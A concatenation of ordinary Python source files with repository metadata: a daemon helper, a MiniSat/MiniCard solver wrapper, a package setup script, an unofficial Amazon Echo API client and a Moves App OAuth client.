            sys.exit(1)
        # Start the daemon
        self.daemonize()
        self.run()
    def stop(self):
        """
        Stop the daemon
        """
        # Get the pid from the pidfile
        try:
            with open(self.pidfile, 'r') as pf:
                pid = int(pf.read().strip())
        except IOError:
            pid = None
        if not pid:
            message = "pidfile %s does not exist. Daemon not running?\n"
            sys.stderr.write(message % self.pidfile)
            return # not an error in a restart
        # Try killing the daemon process
        try:
            while 1:
                pgid = os.getpgid(pid)
                # kill the whole process tree so that there are no zombies left
                os.killpg(pgid, SIGTERM)
                time.sleep(0.1)
        except OSError as err:
            # Fix: substring match instead of ``find(...) > 0`` which missed
            # a match at position 0.
            if "No such process" in str(err):
                os.remove(self.pidfile)
            else:
                print(str(err))
                sys.exit(1)
    def restart(self):
        """
        Restart the daemon
        """
        self.stop()
        self.start()
    def run(self):
        """
        You should override this method when you subclass Daemon. It will be called after the process has been
        daemonized by start() or restart().
        """
"repo_name": "Kortemme-Lab/klab",
"path": "klab/process3.py",
"copies": "1",
"size": "4264",
"license": "mit",
"hash": 9011702377435957000,
"line_mean": 29.9057971014,
"line_max": 115,
"alpha_frac": 0.5082082552,
"autogenerated": false,
"ratio": 3.99250936329588,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.500071761849588,
"avg_score": null,
"num_lines": null
} |
"""A Python API for the MiniSat_ and MiniCard_ constraint solvers.
.. _MiniSat: http://minisat.se/
.. _MiniCard: http://git.io/minicard
Classes:
Solver
An abstract base class for the other classes.
SubsetMixin
A mixin class adding 'subset' functionality to Solver subclasses.
:class:`MinisatSolver`
Solve CNF instances using MiniSat.
:class:`MinicardSolver`
Solve CNF+ (CNF plus cardinality constraints) using MiniCard.
:class:`MinisatSubsetSolver`
Solve arbitrary subsets of CNF instances and find SAT subsets / UNSAT cores.
:class:`MinicardSubsetSolver`
Solve arbitrary subsets of CNF+ instances and find SAT subsets / UNSAT cores.
"""
import array
import os
import ctypes
from abc import ABCMeta, abstractmethod
from ctypes import c_void_p, c_ubyte, c_bool, c_int
class Solver(object):
    """The Solver class is an abstract base class for MiniSat and
    MiniCard solver classes. It provides the basic methods that both
    contain, closely following the methods in MiniSat and MiniCard's
    Solver class.
    Solver should not be instantiated directly. Instead, use its
    subclasses MinisatSolver, MinicardSolver, MinisatSubsetSolver, or
    MinicardSubsetSolver (see below).
    """
    __metaclass__ = ABCMeta
    @abstractmethod
    def __init__(self, libfilename):
        self._setup_lib(libfilename)
        self.s = self.lib.Solver_new()
    def _setup_lib(self, libfilename):
        """Load the minisat library with ctypes and create a Solver
        object. Correct return types (if not int as assumed by
        ctypes) and set argtypes for functions from the minisat
        library.
        """
        dirname = os.path.dirname(os.path.abspath(__file__))
        libfile = dirname + '/' + libfilename
        if not os.path.exists(libfile):
            raise IOError("Specified library file not found. Did you run 'make' to build the solver libraries?\nFile not found: %s" % libfile)
        # Fix: reuse the path computed above instead of rebuilding it.
        self.lib = ctypes.cdll.LoadLibrary(libfile)
        l = self.lib
        l.Solver_new.restype = c_void_p
        l.Solver_new.argtypes = []
        l.Solver_delete.argtypes = [c_void_p]
        l.nVars.argtypes = [c_void_p]
        l.nClauses.argtypes = [c_void_p]
        l.setPhaseSaving.argtypes = [c_void_p, c_int]
        l.setRndPol.argtypes = [c_void_p, c_bool]
        l.newVar.argtypes = [c_void_p, c_ubyte, c_bool]
        l.addClause.restype = c_bool
        l.addClause.argtypes = [c_void_p, c_int, c_void_p]
        l.addUnit.restype = c_bool
        l.addUnit.argtypes = [c_void_p, c_int]
        l.solve.restype = c_bool
        l.solve.argtypes = [c_void_p]
        l.solve_assumptions.restype = c_bool
        l.solve_assumptions.argtypes = [c_void_p, c_int, c_void_p]
        l.simplify.restype = c_bool
        l.simplify.argtypes = [c_void_p]
        l.unsatCore.argtypes = [c_void_p, c_int, c_void_p]
        l.modelValue.argtypes = [c_void_p, c_int]
        l.fillModel.argtypes = [c_void_p, c_void_p, c_int, c_int]
        l.getModelTrues.restype = c_int
        l.getModelTrues.argtypes = [c_void_p, c_void_p, c_int, c_int]
        l.getImplies.argtypes = [c_void_p, c_void_p]
        l.getImplies.restype = c_int
    def __del__(self):
        """Delete the Solver object"""
        self.lib.Solver_delete(self.s)
    @staticmethod
    def _to_intptr(a):
        """Helper function to get a ctypes POINTER(c_int) for an array"""
        addr, size = a.buffer_info()
        return ctypes.cast(addr, ctypes.POINTER(c_int)), size
    def new_var(self, polarity=None, dvar=True):
        """Create a new variable in the solver.
        Args:
            polarity (bool):
                The default polarity for this variable. True = variable's
                default is True, etc. Note that this is the reverse of the 'user
                polarity' in MiniSat, where True indicates the *sign* is True,
                hence the default value is False.
            dvar (bool):
                Whether this variable will be used as a decision variable.
        Returns:
            The new variable's index (0-based counting).
        """
        if polarity is None:
            pol_int = 2
        elif polarity is True:
            pol_int = 1
        elif polarity is False:
            pol_int = 0
        else:
            # Fix: any other value previously fell through and raised an
            # obscure UnboundLocalError; fail with a clear message instead.
            raise ValueError("polarity must be True, False, or None: %r" % (polarity,))
        return self.lib.newVar(self.s, pol_int, dvar)
    def nvars(self):
        '''Get the number of variables created in the solver.'''
        return self.lib.nVars(self.s)
    def nclauses(self):
        '''Get the number of clauses or constraints added to the solver.'''
        return self.lib.nClauses(self.s)
    def set_phase_saving(self, ps):
        '''Set the level of phase saving (0=none, 1=limited, 2=full (default)).'''
        self.lib.setPhaseSaving(self.s, ps)
    def set_rnd_pol(self, val):
        '''Set whether random polarities are used for decisions (overridden if vars are created with a user polarity other than None)'''
        self.lib.setRndPol(self.s, val)
    def add_clause(self, lits):
        """Add a clause to the solver.
        Args:
            lits:
                A list of literals as integers. Each integer specifies a
                variable with *1*-based counting and a sign via the sign of the
                integer. Ex.: [-1, 2, -3] is (!x0 + x1 + !x2)
        Returns:
            A boolean value returned from MiniSat's ``addClause()`` function,
            indicating success (True) or conflict (False).
        """
        if not all(abs(x) <= self.nvars() for x in lits):
            raise Exception("Not all variables in %s are created yet. Call new_var() first." % lits)
        if len(lits) > 1:
            a = array.array('i', lits)
            a_ptr, size = self._to_intptr(a)
            return self.lib.addClause(self.s, size, a_ptr)
        elif len(lits) == 1:
            # addUnit is a faster path for single-literal clauses.
            return self.lib.addUnit(self.s, lits[0])
        else:
            # Empty clause: the formula becomes trivially unsatisfiable.
            return self.lib.addClause(self.s, 0, None)
    def solve(self, assumptions=None):
        """Solve the current set of clauses, optionally with a set of assumptions.
        Args:
            assumptions:
                An optional iterable returning literals as integers, specified as
                in ``add_clause()``.
        Returns:
            True if the clauses (and assumptions) are satisfiable, False otherwise.
        """
        if assumptions is None:
            return self.lib.solve(self.s)
        else:
            a = array.array('i', assumptions)
            a_ptr, size = self._to_intptr(a)
            return self.lib.solve_assumptions(self.s, size, a_ptr)
    def simplify(self):
        '''Call Solver.simplify().'''
        return self.lib.simplify(self.s)
    def get_model(self, start=0, end=-1):
        """Get the current model from the solver, optionally retrieving only a slice.
        Args:
            start, end (int):
                Optional start and end indices, interpreted as in ``range()``.
        Returns:
            An array of booleans indexed to each variable (from 0). If a start
            index was given, the returned list starts at that index (i.e.,
            ``get_model(10)[0]`` is index 10 from the solver's model.
        """
        if end == -1:
            end = self.nvars()
        a = array.array('i', [-1] * (end-start))
        a_ptr, size = self._to_intptr(a)
        self.lib.fillModel(self.s, a_ptr, start, end)
        return a
    def get_model_trues(self, start=0, end=-1):
        """Get variables assigned true in the current model from the solver.
        Args:
            start, end (int):
                Optional start and end indices, interpreted as in ``range()``.
        Returns:
            An array of true variables in the solver's current model. If a
            start index was given, the variables are indexed from that value.
        """
        if end == -1:
            end = self.nvars()
        a = array.array('i', [-1] * (end-start))
        a_ptr, size = self._to_intptr(a)
        count = self.lib.getModelTrues(self.s, a_ptr, start, end)
        # reduce the array down to just the valid indexes
        return a[:count]
    def model_value(self, i):
        '''Get the value of a given variable in the current model.'''
        return self.lib.modelValue(self.s, i)
    def implies(self):
        """Get literals known to be implied by the current formula. (I.e., all
        assignments made at level 0.)
        Returns:
            An array of literals.
        """
        a = array.array('i', [-1] * self.nvars())
        a_ptr, size = self._to_intptr(a)
        count = self.lib.getImplies(self.s, a_ptr)
        # reduce the array down to just the valid indexes
        return a[:count]
class SubsetMixin(object):
    """A mixin for any Solver class that lets it reason about subsets of a clause set."""
    _origvars = None
    _relvars = None
    def set_varcounts(self, vars, constraints):
        """Record the number of "original" variables and soft constraints,
        as opposed to clause-selector variables, etc.
        """
        self._origvars = vars
        self._relvars = constraints
    def add_clause_instrumented(self, lits, index):
        """Add a "soft" clause guarded by a relaxation variable derived
        from *index* (0-based).
        Args:
            lits:
                A list of literals specified as in ``add_clause()``.
            index (int):
                A 0-based index into the set of soft clauses; determines the
                relaxation variable and identifies the clause in subsets
                passed to ``solve_subset()``, etc.
        """
        if self._origvars is None:
            raise Exception("SubsetSolver.set_varcounts() must be called before .add_clause_instrumented()")
        selector = self._origvars + 1 + index
        self.add_clause([-selector] + lits)
    def solve_subset(self, subset):
        """Solve all "hard" clauses (those added with the regular
        ``add_clause()`` method) together with the given subset of soft
        clauses.
        Args:
            subset:
                An iterable containing the indexes of any soft clauses to be included.
        Returns:
            True if the given subset is satisfiable, False otherwise.
        """
        if self._origvars is None:
            raise Exception("SubsetSolver.set_varcounts() must be called before .solve_subset()")
        # Map each clause index to its selector variable and assume it true.
        assumptions = array.array('i', (self._origvars + 1 + i for i in subset))
        buf, count = self._to_intptr(assumptions)
        return self.lib.solve_assumptions(self.s, count, buf)
    def unsat_core(self):
        """Get an UNSAT core from the last check performed by
        ``solve_subset()``. Assumes the last such check was UNSAT.
        """
        core = array.array('i', [-1] * self.nclauses())
        buf, _size = self._to_intptr(core)
        used = self.lib.unsatCore(self.s, self._origvars, buf)
        # Only the first ``used`` entries were filled in by the solver.
        return core[:used]
    def sat_subset(self):
        """Get the set of clauses satisfied in the last check performed by
        ``solve_subset()``. Assumes the last such check was SAT. This may
        contain additional soft clauses not in the subset that was given to
        ``solve_subset()``, if they were also satisfied by the model found.
        """
        base = self._origvars
        return self.get_model_trues(start=base, end=base + self._relvars)
class MinisatSolver(Solver):
    """A Python wrapper mirroring MiniSat's Solver class.
    >>> S = MinisatSolver()
    Variables are created with ``new_var()``.  Clauses are added as lists of
    literals via ``add_clause()``, mirroring MiniSat's ``add_clause()``.  A
    literal is an integer: its magnitude is the variable index (1-based) and
    its sign selects True/False.  For example,
    to add clauses (x0), (!x1), (!x0 + x1 + !x2), and (x2 + x3):
    >>> for i in range(4):
    ...     S.new_var()  # doctest: +ELLIPSIS
    0
    1
    2
    3
    >>> for clause in [1], [-2], [-1, 2, -3], [3, 4]:
    ...     S.add_clause(clause)  # doctest: +ELLIPSIS
    True
    True
    True
    True
    The ``solve()`` method returns True or False just like MiniSat's.
    >>> S.solve()
    True
    Models are returned as arrays of Booleans, indexed by var.
    So the following represents x0=True, x1=False, x2=False, x3=True.
    >>> list(S.get_model())
    [1, 0, 0, 1]
    The ``add_clause()`` method may return False if a conflict is detected
    when adding the clause, even without search.
    >>> S.add_clause([-4])
    False
    >>> S.solve()
    False
    """
    def __init__(self):
        # Point the shared base class at the MiniSat shared library.
        Solver.__init__(self, "libminisat.so")
class MinicardSolver(Solver):
    """A Python analog to MiniCard's Solver class.
    >>> S = MinicardSolver()
    This has the same interface as :class:`MiniSatSolver`, with the addition of
    the ``add_atmost()`` method.
    >>> for i in range(4):
    ...     S.new_var()  # doctest: +ELLIPSIS
    0
    1
    2
    3
    >>> for clause in [1], [-2], [3, 4]:
    ...     S.add_clause(clause)
    True
    True
    True
    To add an AtMost constraint, specify the set of literals and the bound. For example, to add AtMost({x0, !x1, x2}, 2):
    >>> S.add_atmost([1,-2,3], 2)
    True
    >>> S.solve()
    True
    >>> list(S.get_model())
    [1, 0, 0, 1]
    As with ``add_clause()``, the ``add_atmost()`` method may return False if a
    conflict is detected when adding the constraint, even without search.
    >>> S.add_atmost([1,-3,4], 2)
    False
    >>> S.solve()
    False
    """
    def __init__(self):
        super(MinicardSolver, self).__init__("libminicard.so")
    def _setup_lib(self, libfilename):
        """Correct return types (if not int as assumed by ctypes) and set argtypes for
        functions from the minicard library.
        """
        super(MinicardSolver, self)._setup_lib(libfilename)
        # additional function for minicard
        l = self.lib
        l.addAtMost.restype = c_bool
        l.addAtMost.argtypes = [c_void_p, c_int, c_void_p, c_int]
    def add_atmost(self, lits, k):
        """Add an AtMost constraint to the solver.
        Args:
            lits:
                A list of literals as integers. Each integer specifies a
                variable with **1**-based counting and a sign via the sign of
                the integer. Ex.: [-1, 2, -3] is {!x0, x1, !x2}
            k (int):
                The [upper] bound to place on these literals (assumed >= 0).
        Returns:
            A boolean value returned from MiniCard's ``addAtMost()``
            function, indicating success (True) or conflict (False).
        """
        if not all(abs(x) <= self.nvars() for x in lits):
            raise Exception("Not all variables in %s are created yet. Call new_var() first." % lits)
        if len(lits) > 1:
            a = array.array('i', lits)
            a_ptr, size = self._to_intptr(a)
            return self.lib.addAtMost(self.s, size, a_ptr, k)
        elif len(lits) == 1:
            # Fix: a single-literal constraint was previously dropped on the
            # floor (the old code passed an empty constraint to the solver).
            # AtMost({l}, k>=1) is trivially satisfied; AtMost({l}, 0) is the
            # unit clause (!l).
            if k >= 1:
                return True
            return self.lib.addUnit(self.s, -lits[0])
        else:
            # Empty literal set: trivially satisfied for any k >= 0.
            return self.lib.addAtMost(self.s, 0, None, 0)
class MinisatSubsetSolver(SubsetMixin, MinisatSolver):
    """A class for reasoning about subsets of constraints within MiniSat.
    >>> S = MinisatSubsetSolver()
    It must be told explicitly how many of its variables are "real" and how many
    are relaxation variables for constraints.
    >>> S.set_varcounts(vars = 4, constraints = 5)
    >>> for i in range(4+5):
    ...     _ = S.new_var()
    "Soft" clauses are added with ``add_clause_instrumented()``, which has no
    return value, as it is impossible for these clauses to produce a conflict.
    >>> for i, clause in enumerate([[1], [-2], [-1, 2, 3], [-3], [-1]]):
    ...     S.add_clause_instrumented(clause, i)
    Any subset of the constraints can be tested for satisfiability. Subsets
    are specified as iterables containing soft clause indexes.
    >>> S.solve_subset([0,1,2])
    True
    If a subset is found to be satisfiable, a potentially larger satisfied
    subset can be found. Satisfiable subsets are returned as array objects.
    >>> satset = S.sat_subset()
    >>> sorted(satset)
    [0, 1, 2]
    If a subset is found to be unsatisfiable, an UNSAT core can be found.
    Cores are returned as array objects.
    >>> S.solve_subset([0,1,2,3])
    False
    >>> core = S.unsat_core()
    >>> sorted(core)
    [0, 1, 2, 3]
    """
    # All functionality is inherited from SubsetMixin and MinisatSolver.
    pass
class MinicardSubsetSolver(SubsetMixin, MinicardSolver):
    """A class for reasoning about subsets of constraints within MiniCard.
    This has the same interface as :class:`MinisatSubsetSolver`, with the
    addition of the ``add_atmost()`` method.
    >>> S = MinicardSubsetSolver()
    >>> S.set_varcounts(vars = 4, constraints = 4)
    >>> for i in range(4+4):
    ...     _ = S.new_var()
    >>> for i, clause in enumerate([[1], [-2], [3], [4]]):
    ...     S.add_clause_instrumented(clause, i)
    AtMost constraints cannot be instrumented -- they must be hard constraints.
    >>> S.add_atmost([1,-2,3], 2)
    True
    >>> S.solve_subset([0,1])
    True
    >>> S.solve_subset([0,1,2,3])
    False
    >>> core = S.unsat_core()
    >>> sorted(core)
    [0, 1, 2]
    """
    # All functionality is inherited from SubsetMixin and MinicardSolver.
    pass
| {
"repo_name": "tejasnikumbh/AllSAT",
"path": "minisolvers.py",
"copies": "3",
"size": "17517",
"license": "mit",
"hash": -910697848038940400,
"line_mean": 33.013592233,
"line_max": 143,
"alpha_frac": 0.5964491637,
"autogenerated": false,
"ratio": 3.6947901286648386,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.000531528476147044,
"num_lines": 515
} |
"""A Python backport of CMU Twokenize.
"""
import os
try:
from setuptools import setup
except ImportError:
from distutils import setup
from distutils.command.clean import clean as Clean
import shutil
import subprocess
############################
# Distribution details
############################
DISTNAME = 'twokenize_py'
PACKAGE_NAME = 'twokenize_py'
DESCRIPTION = 'Python backport of Twokenize.'
MAINTAINER = 'Neville Ryant'
MAINTAINER_EMAIL = 'nryant@gmail.com'
URL = 'https://github.com/nryant/twokenize_py'
LICENSE = 'Apache 2.0'
VERSION = '0.5'
###########################
# Clean command
###########################
# File extensions removed from the package tree by the clean command.
REMOVE_EXTENSIONS = {'.pyc', '.pyd', '.so', '.dll'}
class CleanCommand(Clean):
    """``clean`` command that also removes build artifacts and bytecode."""
    def run(self):
        Clean.run(self)
        # Remove the build tree and egg-info metadata when present.
        for stale_dir in ('build', '%s.egg-info' % PACKAGE_NAME):
            if os.path.exists(stale_dir):
                shutil.rmtree(stale_dir)
        # Drop compiled/extension files left inside the package tree.
        for dirpath, _dirnames, filenames in os.walk(PACKAGE_NAME):
            for name in filenames:
                if os.path.splitext(name)[1] in REMOVE_EXTENSIONS:
                    os.remove(os.path.join(dirpath, name))
############################
# Setup
############################
def get_packages():
    """Return dotted package names under PACKAGE_NAME, skipping tests dirs."""
    found = []
    for dirpath, _dirnames, _fns in os.walk(PACKAGE_NAME):
        if os.path.basename(dirpath) == 'tests':
            continue
        # Only directories with an __init__.py are importable packages.
        if os.path.isfile(os.path.join(dirpath, '__init__.py')):
            found.append(dirpath.replace(os.path.sep, '.'))
    return found
def get_full_version():
    """Return VERSION, with a dev suffix and short git hash when run from a checkout."""
    if not os.path.exists('.git'):
        return VERSION
    return VERSION + '.dev-' + get_git_revision()[:7]
def get_git_revision():
    """Return the current git revision hash, or "Unknown" when git cannot
    be invoked (e.g. not installed).
    """
    def _minimal_ext_cmd(cmd):
        # Run *cmd* under a minimal, locale-neutral environment so the
        # output format is stable across machines.
        env = {}
        for k in ['SYSTEMROOT', 'PATH']:
            v = os.environ.get(k)
            if v is not None:
                env[k] = v
        # LANGUAGE is used on win32
        env['LANGUAGE'] = 'C'
        env['LANG'] = 'C'
        # Fix: was 'C;' -- the stray semicolon made the locale value invalid.
        env['LC_ALL'] = 'C'
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)
        stdout = p.communicate()[0]
        return stdout
    try:
        out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
        git_revision = out.strip().decode('ascii')
    except OSError:
        git_revision = "Unknown"
    return git_revision
def write_version_py(fn, version):
    """Write ``version = '<version>'`` to the file *fn*.

    Fix: the original opened the file in binary mode ('wb') and then wrote a
    str, which raises TypeError under Python 3; text mode is correct here.
    """
    with open(fn, 'w') as f:
        f.write("version = '%s'\n" % version)
def setup_package():
    """Write <package>/version.py, then invoke setup() with the project metadata."""
    full_version = get_full_version()
    write_version_py(os.path.join(PACKAGE_NAME, 'version.py'), full_version)
    setup(name=DISTNAME,
          maintainer=MAINTAINER,
          maintainer_email=MAINTAINER_EMAIL,
          description=DESCRIPTION,
          license=LICENSE,
          url=URL,
          version=full_version,
          packages=get_packages(),
          cmdclass={'clean': CleanCommand},
          )
if __name__ == '__main__':
    setup_package()
| {
"repo_name": "nryant/twokenize_py",
"path": "setup.py",
"copies": "1",
"size": "3162",
"license": "apache-2.0",
"hash": 3856408247909985000,
"line_mean": 25.7966101695,
"line_max": 71,
"alpha_frac": 0.5477545857,
"autogenerated": false,
"ratio": 3.6853146853146854,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47330692710146854,
"avg_score": null,
"num_lines": null
} |
# A Python class for connection to the Amazon Echo API
# By Scott Vanderlind, December 31 2014
import requests, json, urllib, cookielib
from bs4 import BeautifulSoup
class PyEcho:
    """A Python 2 client for the (unofficial) Amazon Echo web API.

    Logs in with the given credentials on construction, then exposes the
    to-do/shopping/device/card endpoints served at pitangui.amazon.com.
    """
    # Base URL for all API requests.
    url = "https://pitangui.amazon.com"
    email = ""
    password = ""
    # Becomes a requests.Session() in __init__; False until then.
    session = False
    # Set by login() to indicate whether authentication succeeded.
    loginsuccess = False
    # NOTE(review): this hard-coded csrf value appears unused -- PUT requests
    # read the server-issued "csrf" cookie via getCsrfCookie() instead.
    # Confirm before removing.
    csrf = "-2092727538"
    def __init__(self, email, password):
        self.email = email
        self.password = password
        self.session = requests.Session()
        self.login()
    ## Log in to the Amazon Echo API by scraping and submitting the login form.
    def login(self):
        print "logging in..."
        # Get the login page and retrieve our form action.
        loginPage = self.get("")
        loginSoup = BeautifulSoup(loginPage.text)
        form = loginSoup.find('form')
        action = form.get('action')
        # Create our parameter payload
        parameters = {}
        # let's not forget our email and password
        parameters['email'] = self.email
        parameters['password'] = self.password
        parameters['create'] = "0"
        # We need to keep the hidden fields around
        hidden = form.find_all(type="hidden")
        for el in hidden:
            parameters[el['name']] = el['value']
        # Set up the headers for the request
        headers = self.getHeaders()
        headers['Referer'] = self.url
        # Now, we can create a new post request to log in
        login = self.session.post(action, data=parameters, headers=headers)
        # Success is signalled by the presence of Amazon's request-id header.
        if 'x-amzn-requestid' not in login.headers:
            print "Error logging in! Got status " + str(login.status_code)
            self.loginsuccess = False
        else:
            print "Login success!"
            self.loginsuccess = True
    ## Fetch up to 10 TASK-type to-do items.
    def tasks(self):
        params = {'type':'TASK', 'size':'10'}
        tasks = self.get('/api/todos', params)
        return json.loads(tasks.text)['values']
    ## Fetch up to 10 shopping-list items.
    def shoppingitems(self):
        params = {'type':'SHOPPING_ITEM', 'size':'10'}
        items = self.get('/api/todos', params)
        return json.loads(items.text)['values']
    ## Mark a task deleted and push the change to the API.
    def deleteTask(self, task):
        task['deleted'] = True
        return self.put('/api/todos/' + urllib.quote_plus(task['itemId']), task)
    ## Mark a shopping item deleted and push the change to the API.
    def deleteShoppingItem(self, item):
        item['deleted'] = True
        return self.put('/api/todos/' + urllib.quote_plus(item['itemId']), item)
    ## List registered Echo devices.
    def devices(self):
        devices = self.get('/api/devices/device')
        return json.loads(devices.text)['devices']
    ## Fetch up to 10 activity cards.
    def cards(self):
        params = {'limit':'10'}
        cards = self.get('/api/cards', params)
        return json.loads(cards.text)['cards']
    ## Fetch pending notifications.
    def notifications(self):
        notes = self.get('/api/notifications')
        return json.loads(notes.text)['notifications']
    ## List linked third-party services.
    def services(self):
        services = self.get('/api/third-party')
        return json.loads(services.text)['services']
    ## Fetch per-device preferences.
    def preferences(self):
        prefs = self.get('/api/device-preferences')
        return json.loads(prefs.text)['devicePreferences']
    ## Fetch the configured wake words.
    def wakeWords(self):
        words = self.get('/api/wake-word')
        return json.loads(words.text)['wakeWords']
    #####
    ## Helper functions are below
    #####
    ## Make an authenticated GET request
    def get(self, url, data=False):
        headers = self.getHeaders()
        return self.session.get(self.url + url, headers=headers, params=data)
    ## Make an authenticated PUT request
    def put(self, url, payload):
        headers = self.getHeaders()
        headers['Content-type'] = 'application/json'
        headers['csrf'] = self.getCsrfCookie()
        headers['Accept'] = 'application/json, text/javascript, */*; q=0.01'
        return self.session.put(url=self.url + url, data=json.dumps(payload), headers=headers)
    ## Fetch the CSRF token from the cookie jar, set by the server.
    ## CookieLib's documentation is really not great, at least that I could find
    ## so in order to get our csrf token from the cookie, we have to iterate
    ## over the jar and match by name. Fine. Whatever.
    def getCsrfCookie(self):
        for cookie in self.session.cookies:
            if cookie.name == "csrf":
                return cookie.value
    ## Prepare common headers that we send with all requests.
    def getHeaders(self):
        headers = {}
        headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'
        headers['Charset'] = 'utf-8'
        headers['Origin'] = 'http://echo.amazon.com'
        headers['Referer'] = 'http://echo.amazon.com/spa/index.html'
        return headers
| {
"repo_name": "peterhajas/control",
"path": "alexa/PyEcho/PyEcho.py",
"copies": "1",
"size": "4485",
"license": "bsd-2-clause",
"hash": 5594839120860065000,
"line_mean": 32.7218045113,
"line_max": 151,
"alpha_frac": 0.6327759197,
"autogenerated": false,
"ratio": 3.81053525913339,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.494331117883339,
"avg_score": null,
"num_lines": null
} |
# A python class for easy access to the Moves App data. Created by Joost Plattel [http://github.com/jplattel]
import requests
import logging
class Moves():
    """A thin client for the Moves App REST API: OAuth handshake plus
    data-fetching endpoints.  Created by Joost Plattel.
    """
    def __init__(self, client_id, client_secret, redirect_url, \
            api_url = 'https://api.moves-app.com/oauth/v1/'):
        self.client_id = client_id # Client ID, get this by creating an app
        self.client_secret = client_secret # Client Secret, get this by creating an app
        self.redirect_url = redirect_url # Callback URL for getting an access token
        self.api_url = api_url
    # Generate an request URL
    def request_url(self):
        """Build the user-facing authorization URL; open it to obtain a PIN,
        then authenticate with it to get a request-code at the callback URL.
        """
        u = 'https://api.moves-app.com/oauth/v1/authorize?response_type=code'
        c = '&client_id=' + self.client_id
        s = '&scope=' + 'activity location' # Assuming we want both activity and locations
        url = u + c + s
        return url
    # Get access_token
    def auth(self, request_token):
        """Exchange *request_token* for an access token."""
        c = '&client_id=' + self.client_id
        r = '&redirect_uri=' + self.redirect_url
        s = '&client_secret=' + self.client_secret
        j = requests.post(self.api_url + 'access_token?grant_type=authorization_code&code=' + request_token + c + s + r)
        logging.debug(j.content)
        self.access_json = j.json()
        token = self.access_json['access_token']
        return token
    # Standard GET and profile requests
    # Base request
    def get(self, token, endpoint):
        """GET *endpoint* with the given access token; return parsed JSON."""
        token = '?access_token=' + token
        return requests.get(self.api_url + endpoint + token).json()
    # /user/profile
    def get_profile(self, token):
        """Fetch the authenticated user's profile."""
        token = '?access_token=' + token
        root = '/user/profile'
        return requests.get(self.api_url + root + token).json()
    # Summary requests
    # /user/summary/daily/<date>
    # /user/summary/daily/<week>
    # /user/summary/daily/<month>
    def get_summary(self, token, date):
        """Fetch a daily/weekly/monthly summary for *date*."""
        token = '?access_token=' + token
        return requests.get(self.api_url + '/user/summary' + date + token).json()
    # Range requests, max range of 7 days!
    # /user/summary/daily?from=<start>&to=<end>
    # /user/activities/daily?from=<start>&to=<end>
    # /user/places/daily?from=<start>&to=<end>
    # /user/storyline/daily?from=<start>&to=<end>
    def get_range(self, access_token, endpoint, start, end):
        """Fetch *endpoint* over the date range [start, end] (max 7 days)."""
        # Fix: the original called the bare name ``get`` (NameError at
        # runtime); the method lives on the instance.
        return self.get(access_token, endpoint + '?from=' + start + '&to=' + end)
| {
"repo_name": "sdsingh/e-mission-server",
"path": "CFC_WebApp/main/moves.py",
"copies": "1",
"size": "2513",
"license": "bsd-3-clause",
"hash": 6648142861108258000,
"line_mean": 37.0757575758,
"line_max": 166,
"alpha_frac": 0.643454039,
"autogenerated": false,
"ratio": 3.4854368932038833,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4628890932203883,
"avg_score": null,
"num_lines": null
} |
# A python class for easy access to the Moves App data. Created by Joost Plattel [http://github.com/jplattel]
import requests
class Moves():
def __init__(self, client_id, client_secret, redirect_url, \
auth_url = 'https://api.moves-app.com/oauth/v1/', \
api_url = 'https://api.moves-app.com/api/1.1/'):
self.client_id = client_id # Client ID, get this by creating an app
self.client_secret = client_secret # Client Secret, get this by creating an app
self.redirect_url = redirect_url # Callback URL for getting an access token
self.api_url = api_url
# Generate an request URL
def request_url(self):
u = 'https://api.moves-app.com/oauth/v1/authorize?response_type=code'
c = '&client_id=' + self.client_id
s = '&scope=' + 'activity location' # Assuming we want both activity and locations
url = u + c + s
return url # Open this URL for the PIN, then authenticate with it and it will redirect you to the callback URL with a request-code, specified in the API access.
# Get access_token
def auth(self, request_token):
c = '&client_id=' + self.client_id
r = '&redirect_uri=' + self.redirect_url
s = '&client_secret=' + self.client_secret
j = requests.post(self.auth_url + 'access_token?grant_type=authorization_code&code=' + request_token + c + s + r)
self.access_json = j.json()
token = self.access_json['access_token']
return token
# Standard GET and profile requests
# Base request
def get(self, token, endpoint):
if ('?' in endpoint):
tokenSep = '&'
else:
tokenSep = '?'
token = tokenSep + 'access_token=' + token
response = requests.get(self.api_url + endpoint + token)
try:
response.raise_for_status();
return response.json()
except requests.exceptions.HTTPError as e:
print "Got HTTP error %s " % e
return []
except:
print "Unable to decode response %s with code %s" % (response.text, response.status_code)
return []
# /user/profile
def get_profile(self, token):
token = '?access_token=' + token
root = 'user/profile'
response = requests.get(self.api_url + root + token)
try:
return response.json()
except:
print "Unable to decode response %s" % response.text
return None
# Summary requests
# /user/summary/daily/<date>
# /user/summary/daily/<week>
# /user/summary/daily/<month>
def get_summary(self, token, date):
    """Return the JSON summary for a date/week/month.

    `date` is expected to include its leading path segment, e.g.
    '/daily/20130315'.
    """
    token = '?access_token=' + token
    # Fix: api_url already ends with '/'; the previous '/user/summary'
    # produced a double slash in the request URL (inconsistent with
    # get_profile, which uses 'user/profile').
    return requests.get(self.api_url + 'user/summary' + date + token).json()
# Range requests, max range of 7 days!
# /user/summary/daily?from=<start>&to=<end>
# /user/activities/daily?from=<start>&to=<end>
# /user/places/daily?from=<start>&to=<end>
# /user/storyline/daily?from=<start>&to=<end>
def get_range(self, access_token, endpoint, start, end):
    """Fetch an endpoint over a date range (the API caps ranges at 7 days).

    Bug fix: previously called the module-level name ``get(...)``, which
    does not exist; it must go through ``self.get()``.
    """
    return self.get(access_token, endpoint + '?from=' + start + '&to=' + end)
| {
"repo_name": "sdsingh/e-mission-server",
"path": "CFC_DataCollector/moves/moves.py",
"copies": "3",
"size": "2987",
"license": "bsd-3-clause",
"hash": 5482749147572457000,
"line_mean": 34.9879518072,
"line_max": 166,
"alpha_frac": 0.6401071309,
"autogenerated": false,
"ratio": 3.4293915040183696,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5569498634918371,
"avg_score": null,
"num_lines": null
} |
# A python class for the Delcom USBLMP 904x multi-color visual signal indicator. This
# has been tested with the 904007-SB but should work with most of the other
